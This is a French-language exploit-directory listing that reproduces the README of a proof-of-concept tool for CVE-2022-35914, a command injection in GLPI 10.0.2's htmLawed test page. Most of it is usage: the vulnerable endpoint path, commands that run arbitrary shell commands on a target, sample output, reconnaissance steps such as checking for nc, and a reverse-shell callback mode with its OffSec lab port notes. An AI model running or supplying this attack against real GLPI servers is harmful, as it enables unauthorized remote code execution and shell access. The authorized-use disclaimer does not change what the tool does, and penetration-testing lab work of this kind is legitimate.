Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/cyb3rk0ala/cve-2022-35914-rce
ExploitationExploitation d'Applications WebTests d'IntrusionOutil d'Accès à Distance
GitHubcyb3rk0ala/cve-2022-35914-rce

CVE-2022-35914-RCE

Exploit PoC pour CVE-2022-35914 — Injection de commande htmLawed dans GLPI v.10.0.2, exécution de commande et prise en charge de reverse shell.

Voir le dépôt
14il y a 1 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2022-35914 par cyb3rk0ala

PoC pour CVE-2022-35914, une vulnérabilité d'injection de commandes impliquant le composant de test htmLawed dans les installations GLPI vulnérables.

L'outil permet l'exécution de commandes via le point de terminaison vulnérable et inclut une fonctionnalité de callback optionnelle pour les environnements de laboratoire autorisés.

Avertissement : Ce projet est destiné uniquement aux tests de sécurité autorisés, aux CTF, aux laboratoires OffSec/PG et à des fins éducatives. Ne l'utilisez pas contre des systèmes sans autorisation explicite.


Vulnérabilité

ChampDétails
CVECVE-2022-35914
LogicielGLPI v.10.0.2
ComposanthtmLawed
Point de terminaison vulnérable/vendor/htmlawed/htmlawed/htmLawedTest.php

Le composant vulnérable peut permettre l'exécution de commandes via des paramètres spécialement conçus sur les installations affectées.


Fonctionnalités

  • Exécution de commandes
  • Construction automatique de l'URL cible
  • Port HTTP cible configurable
  • Récupération automatique de session/jeton
  • Extraction de la sortie des commandes
  • Vérification de la cible
  • Prise en charge d'un User-Agent personnalisé
  • Configuration optionnelle du callback
  • Sortie terminal colorée
  • Interface CLI Python 3

Prérequis

Python 3 et les dépendances requises.

Kali Linux

sudo apt install python3-requests python3-bs4

Environnement virtuel

python3 -m venv venv
source venv/bin/activate
pip install requests beautifulsoup4

Installation

Cloner le dépôt :

git clone https://github.com/cyb3rk0ala/CVE-2022-35914.git
cd CVE-2022-35914

Rendre le script exécutable :

chmod +x glpi.py

Utilisation

Aide

python3 glpi.py -h

Exécution de commande basique

python3 glpi.py -u TARGET_IP -c 'id'

Exemple de sortie :

[*] Target: http://TARGET_IP:80/vendor/htmlawed/htmlawed/htmLawedTest.php

========== COMMAND OUTPUT ==========
uid=33(www-data) gid=33(www-data) groups=33(www-data)
====================================

Exécution de commandes

L'option -c spécifie la commande à exécuter.

Utilisateur actuel

python3 glpi.py -u TARGET_IP -c 'whoami'

Privilèges actuels

python3 glpi.py -u TARGET_IP -c 'id'

Système d'exploitation

python3 glpi.py -u TARGET_IP -c 'uname -a'

Utilitaires disponibles

python3 glpi.py -u TARGET_IP -c 'which bash'
python3 glpi.py -u TARGET_IP -c 'which python3'
python3 glpi.py -u TARGET_IP -c 'which php'
python3 glpi.py -u TARGET_IP -c 'which nc'

Options

OptionDescriptionDéfaut
-u, --urlURL ou adresse IP cibleRequis
-c, --cmdCommande à exécuterid
--checkVérifier la cible sans exécuter de commandeDésactivé
--user-agentUser-Agent HTTP personnaliséDéfaut
-p, --rportPort du service HTTP cible80
-l, --lhostAdresse IP de callback/écoute—
-lp, --lportPort de callback/écoute—

Port cible

L'option -p / --rport spécifie le port sur lequel le service web GLPI vulnérable est en écoute.

Défaut :

80

Exemple :

python3 glpi.py -u TARGET_IP -p 80 -c 'id'

Vérification de la cible

Utilisez --check pour vérifier que la page de test htmLawed est disponible sans exécuter de commande :

python3 glpi.py -u TARGET_IP --check

User-Agent personnalisé

Un User-Agent HTTP personnalisé peut être fourni avec :

python3 glpi.py \
    -u TARGET_IP \
    --user-agent 'Mozilla/5.0'

Reverse Shell

Le script prend en charge des paramètres de callback optionnels :

-l   IP de callback/écoute
-lp  Port de callback/écoute

Exemple :

python3 glpi.py \
    -u TARGET_IP \
    -p 80 \
    -l LHOST \
    -lp 80

Dans cet exemple :

Target:   TARGET_IP:80
Callback: LHOST:80

Les deux ports ont des rôles différents :

-p   = Port HTTP GLPI cible
-lp  = Port de callback/écoute

Note sur le laboratoire OffSec

Lors des tests dans un environnement de laboratoire OffSec, le callback a fonctionné avec succès sur le port TCP 80.

D'autres ports de callback, tels que 4444, peuvent expirer selon le réseau du laboratoire et le filtrage de sortie.

Pour l'environnement testé :

python3 glpi.py \
    -u TARGET_IP \
    -p 80 \
    -l LHOST \
    -lp 80

L'écouteur a été configuré sur l'interface VPN Kali en utilisant le port TCP 80.

Important : L'utilisation du port 80 pour le callback est une observation spécifique à l'environnement. Ce n'est pas une exigence de CVE-2022-35914.


Dépannage

L'exécution de commandes fonctionne mais pas le callback

Vérifiez d'abord l'exécution de commandes :

python3 glpi.py -u TARGET_IP -c 'id'

Vérifiez si les utilitaires requis existent :

python3 glpi.py -u TARGET_IP -c 'which bash'
python3 glpi.py -u TARGET_IP -c 'which python3'
python3 glpi.py -u TARGET_IP -c 'which php'
python3 glpi.py -u TARGET_IP -c 'which nc'

Si l'exécution de commandes fonctionne mais que le callback expire, vérifiez le routage VPN et le port de callback.


La sortie des commandes semble incorrecte

Si l'analyse de la sortie des commandes échoue, la réponse HTTP complète est enregistrée dans :

/tmp/glpi.html

Inspectez-la avec :

less /tmp/glpi.html

ou :

mousepad /tmp/glpi.html

Exemple de flux de travail

1. Vérifier la cible

python3 glpi.py \
    -u TARGET_IP \
    --check

2. Confirmer l'exécution de commandes

python3 glpi.py \
    -u TARGET_IP \
    -c 'id'

3. Identifier l'utilisateur actuel

python3 glpi.py \
    -u TARGET_IP \
    -c 'whoami'

4. Vérifier les outils disponibles

python3 glpi.py \
    -u TARGET_IP \
    -c 'which nc'

5. Configurer le callback

Pour l'environnement de laboratoire OffSec testé :

python3 glpi.py \
    -u TARGET_IP \
    -p 80 \
    -l LHOST \
    -lp 80

Avertissement

Ce projet est fourni uniquement à des fins éducatives et de tests de sécurité autorisés.

L'auteur n'est pas responsable de toute utilisation abusive, dommage, accès non autorisé ou activité illégale impliquant ce logiciel.

Obtenez toujours une autorisation explicite avant de tester un système.


Auteur

cyb3rk0ala


CVE

CVE-2022-35914


Projet

CVE-2022-35914 par cyb3rk0ala

Télécharger l’outil